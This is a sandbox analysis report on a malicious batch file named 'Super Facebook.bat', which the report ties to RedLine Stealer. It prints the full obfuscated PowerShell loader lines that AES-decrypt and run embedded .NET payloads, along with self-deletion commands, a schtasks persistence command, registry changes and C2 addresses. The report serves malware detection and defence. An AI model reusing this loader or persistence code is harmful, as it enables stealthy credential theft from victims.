File name: | Super Facebook.bat |
Full analysis: | https://app.any.run/tasks/6224895d-b143-4c2d-bd22-4a357f1eaf33 |
Verdict: | Malicious activity |
Threats: | Remote access trojans (RATs) are a type of malware that enables attackers to establish complete or partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. Note that in this run the network signatures below attribute the C2 traffic from Media_SC.bat.exe (108.165.242.134, ports 34097 and 7000) to RedLine Stealer, while Super Facebook.bat.exe reaches api.telegram.org (a legitimate shared service, likely abused here for exfiltration or notification), so the sample is better treated as an information stealer than a generic RAT; it also persists through a scheduled task that re-runs the copy dropped in AppData\Roaming every minute. |
Analysis date: | April 01, 2023, 09:06:21 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators. The very long first line is the payload carrier: the loader (PID 3364) reads the first line of its own .bat, drops the first three characters, splits on '\', then base64-decodes, AES-CBC-decrypts (hard-coded key and IV) and GZip-decompresses each part before loading it as a .NET assembly and invoking its entry point. The process that does this appears to be a copy of powershell.exe written by cmd.exe under the name "Super Facebook.bat.exe" (same description and version as powershell.exe), and a helper PowerShell process deletes that copy once it exits. |
MD5: | 476D87590230E420D07A4D6FD677BD1D |
SHA1: | 29A2C881B58DD4D9EA40C2208952FDC39627265D |
SHA256: | B6EE5CED40C6A82853E8B5543E139254B0AA9C503B670943818B332297293DD2 |
SSDEEP: | 3072:lKEN79wvVZHRTlfG+7nxmiNQuJ7Mhs6gf/Ks+vCN/MG1XLfzz6PM:ld9w7HRT/7nhiu7ks6gfSsrN/nXjzz6U |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1900 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Super Facebook.bat" " | C:\Windows\System32\cmd.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
944 | powershell -w hidden -c # | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
3364 | "C:\Users\admin\AppData\Local\Temp\Super Facebook.bat.exe" function fi($s){$s.Replace('PCgSe', '')}$TvSl=fi 'CPCgSehangPCgSeeExPCgSetenPCgSesiPCgSeoPCgSenPCgSe';$uPOI=fi 'CrPCgSeePCgSeaPCgSeteDPCgSeePCgSecrypPCgSetorPCgSe';$JkhJ=fi 'TraPCgSensPCgSefPCgSeormPCgSeFinaPCgSelBloPCgSecPCgSekPCgSe';$wwku=fi 'RePCgSeadLPCgSeinesPCgSe';$mfAv=fi 'GePCgSetPCgSeCPCgSeurrePCgSentPPCgSerocePCgSesPCgSesPCgSe';$LndS=fi 'FirPCgSestPCgSe';$IOON=fi 'LoaPCgSedPCgSe';$bGTU=fi 'EnPCgSetryPCgSePoPCgSeinPCgSetPCgSe';$VfMB=fi 'FroPCgSemBPCgSeasePCgSe6PCgSe4PCgSeStPCgSeriPCgSengPCgSe';$OqGp=fi 'InvPCgSeokPCgSeePCgSe';function zkztS($GNZBX){$cqmSn=[System.Security.Cryptography.Aes]::Create();$cqmSn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$cqmSn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$cqmSn.Key=[System.Convert]::$VfMB('UJReuXeqHSNd3qVXNxnQQ97OnOfSBItpzbPC/7v6/1s=');$cqmSn.IV=[System.Convert]::$VfMB('l+XIW/qwWmYbLeGbOZpElw==');$kDTzC=$cqmSn.$uPOI();$Eyxis=$kDTzC.$JkhJ($GNZBX,0,$GNZBX.Length);$kDTzC.Dispose();$cqmSn.Dispose();$Eyxis;}function JacSh($GNZBX){$BBOCs=New-Object System.IO.MemoryStream(,$GNZBX);$tgHik=New-Object System.IO.MemoryStream;$sqTvH=New-Object System.IO.Compression.GZipStream($BBOCs,[IO.Compression.CompressionMode]::Decompress);$sqTvH.CopyTo($tgHik);$sqTvH.Dispose();$BBOCs.Dispose();$tgHik.Dispose();$tgHik.ToArray();}function OVfya($GNZBX,$xwUmA){[System.Reflection.Assembly]::$IOON([byte[]]$GNZBX).$bGTU.$OqGp($null,$xwUmA);}$ImGss=[System.Linq.Enumerable]::$LndS([System.IO.File]::$wwku([System.IO.Path]::$TvSl([System.Diagnostics.Process]::$mfAv().MainModule.FileName, $null)));$MefbR = $ImGss.Substring(3).Split('\');$TlioL=JacSh (zkztS ([Convert]::$VfMB($MefbR[0])));$MTOPM=JacSh (zkztS ([Convert]::$VfMB($MefbR[1])));OVfya $MTOPM $null;OVfya $TlioL $null; | C:\Users\admin\AppData\Local\Temp\Super Facebook.bat.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
3792 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3364);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Super Facebook.bat.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
2044 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Media_SC.bat" " | C:\Windows\System32\cmd.exe | Super Facebook.bat.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
1860 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2044);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Super Facebook.bat.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
2884 | powershell -w hidden -c # | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
3284 | "C:\Users\admin\AppData\Local\Temp\Media_SC.bat.exe" function Db($N){$N.Replace('VxHqi', '')}$VTDs=Db 'LoadVxHqi';$ADZU=Db 'GeVxHqitCVxHqiuVxHqirrenVxHqitVxHqiProcVxHqiesVxHqisVxHqi';$ZmeI=Db 'TVxHqiraVxHqinVxHqisfoVxHqirmVxHqiFiVxHqinVxHqialVxHqiBlocVxHqikVxHqi';$rSlJ=Db 'CrVxHqieaVxHqitVxHqieDeVxHqicrVxHqiypVxHqitoVxHqirVxHqi';$gMtj=Db 'RVxHqieadLVxHqiineVxHqisVxHqi';$mYMQ=Db 'EntVxHqiryPoVxHqiintVxHqi';$uoPM=Db 'ChaVxHqingeVxHqiExtVxHqieVxHqinsVxHqiionVxHqi';$Dnti=Db 'FirsVxHqitVxHqi';$qgyV=Db 'InvVxHqioVxHqikeVxHqi';$AnzF=Db 'FrVxHqioVxHqimBVxHqiasVxHqie6VxHqi4SVxHqitrVxHqiiVxHqingVxHqi';function eduzr($pdIWt){$EYVPv=[System.Security.Cryptography.Aes]::Create();$EYVPv.Mode=[System.Security.Cryptography.CipherMode]::CBC;$EYVPv.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$EYVPv.Key=[System.Convert]::$AnzF('4UFXnX30OSBg/EjlyQ9fjGhlnmbo5rsEBxBqLZcJ7jk=');$EYVPv.IV=[System.Convert]::$AnzF('gBEgzZW1Gz1oSSSKvbA72w==');$FqDFb=$EYVPv.$rSlJ();$VPjkE=$FqDFb.$ZmeI($pdIWt,0,$pdIWt.Length);$FqDFb.Dispose();$EYVPv.Dispose();$VPjkE;}function uzNjg($pdIWt){$wxxQI=New-Object System.IO.MemoryStream(,$pdIWt);$wduUe=New-Object System.IO.MemoryStream;$SBwAO=New-Object System.IO.Compression.GZipStream($wxxQI,[IO.Compression.CompressionMode]::Decompress);$SBwAO.CopyTo($wduUe);$SBwAO.Dispose();$wxxQI.Dispose();$wduUe.Dispose();$wduUe.ToArray();}function uLmzf($pdIWt,$nzezJ){[System.Reflection.Assembly]::$VTDs([byte[]]$pdIWt).$mYMQ.$qgyV($null,$nzezJ);}$xTaoc=[System.Linq.Enumerable]::$Dnti([System.IO.File]::$gMtj([System.IO.Path]::$uoPM([System.Diagnostics.Process]::$ADZU().MainModule.FileName, $null)));$ouXIZ = $xTaoc.Substring(3).Split('\');$ViRjv=uzNjg (eduzr ([Convert]::$AnzF($ouXIZ[0])));$bJeLh=uzNjg (eduzr ([Convert]::$AnzF($ouXIZ[1])));uLmzf $bJeLh $null;uLmzf $ViRjv $null; | C:\Users\admin\AppData\Local\Temp\Media_SC.bat.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
3836 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3284);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | Media_SC.bat.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
2316 | "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Super Facebook" /tr "C:\Users\admin\AppData\Roaming\Super Facebook.bat" | C:\Windows\System32\schtasks.exe | — | Super Facebook.bat.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (3364) Super Facebook.bat.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (3364) Super Facebook.bat.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (3364) Super Facebook.bat.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (3364) Super Facebook.bat.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (3284) Media_SC.bat.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (3284) Media_SC.bat.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (3284) Media_SC.bat.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (3284) Media_SC.bat.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (3552) wmpnscfg.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{29946A26-2048-44CF-8751-F8C9230C4C05}\{29060388-EB75-4A91-B955-DC18C2D3786B} |
Operation: | delete key | Name: | (default) |
Value: | |||
(PID) Process: | (3552) wmpnscfg.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{29946A26-2048-44CF-8751-F8C9230C4C05} |
Operation: | delete key | Name: | (default) |
Value: |
PID | Process | Filename | Type | |
---|---|---|---|---|
3364 | Super Facebook.bat.exe | C:\Users\admin\AppData\Local\Temp\Media_SC.bat | text | |
MD5:43D061A5271571B1907684432C97EB74 | SHA256:B510310377730BD75296E15C8E2183DC21492BC0DEFDD564B46149642E0D381B | |||
944 | powershell.exe | C:\Users\admin\AppData\Local\Temp\jtovxxln.ht5.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
944 | powershell.exe | C:\Users\admin\AppData\Local\Temp\ybnb0dy3.ux5.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3792 | powershell.exe | C:\Users\admin\AppData\Local\Temp\xwblrke3.iun.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
1860 | powershell.exe | C:\Users\admin\AppData\Local\Temp\oufuipal.1xr.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
1860 | powershell.exe | C:\Users\admin\AppData\Local\Temp\u5uerh01.asz.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3284 | Media_SC.bat.exe | C:\Users\admin\AppData\Local\Temp\adjxfyvl.z5k.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3364 | Super Facebook.bat.exe | C:\Users\admin\AppData\Roaming\Super Facebook.bat | text | |
MD5:476D87590230E420D07A4D6FD677BD1D | SHA256:B6EE5CED40C6A82853E8B5543E139254B0AA9C503B670943818B332297293DD2 | |||
1900 | cmd.exe | C:\Users\admin\AppData\Local\Temp\Super Facebook.bat.exe | executable | |
MD5:EB32C070E658937AA9FA9F3AE629B2B8 | SHA256:70BA57FB0BF2F34B86426D21559F5F6D05C1268193904DE8E959D7B06CE964CE | |||
3364 | Super Facebook.bat.exe | C:\Users\admin\AppData\Local\Temp\ng0ssa1d.jqv.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3284 | Media_SC.bat.exe | 108.165.242.134:34097 | — | Heymman Servers Corporation | US | malicious |
— | — | 108.165.242.134:7000 | — | Heymman Servers Corporation | US | malicious |
— | — | 149.154.167.220:443 | api.telegram.org | Telegram Messenger Inc | GB | malicious |
Domain | IP | Reputation |
---|---|---|
api.telegram.org | 149.154.167.220 | shared |
PID | Process | Class | Message |
---|---|---|---|
3284 | Media_SC.bat.exe | A Network Trojan was detected | ET MALWARE RedLine Stealer TCP CnC net.tcp Init |
3284 | Media_SC.bat.exe | A Network Trojan was detected | ET MALWARE Redline Stealer TCP CnC Activity |
3284 | Media_SC.bat.exe | A Network Trojan was detected | ET MALWARE Redline Stealer TCP CnC - Id1Response |
3284 | Media_SC.bat.exe | A Network Trojan was detected | ET MALWARE Redline Stealer TCP CnC - Id1Response |
— | — | Misc activity | ET HUNTING Telegram API Domain in DNS Lookup |
3284 | Media_SC.bat.exe | A Network Trojan was detected | ET MALWARE Redline Stealer TCP CnC Activity |
3364 | Super Facebook.bat.exe | Misc activity | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI) |
3364 | Super Facebook.bat.exe | Misc activity | ET HUNTING Telegram API Certificate Observed |
3284 | Media_SC.bat.exe | A Network Trojan was detected | ET MALWARE Redline Stealer TCP CnC Activity |
3284 | Media_SC.bat.exe | A Network Trojan was detected | ET MALWARE Redline Stealer TCP CnC Activity |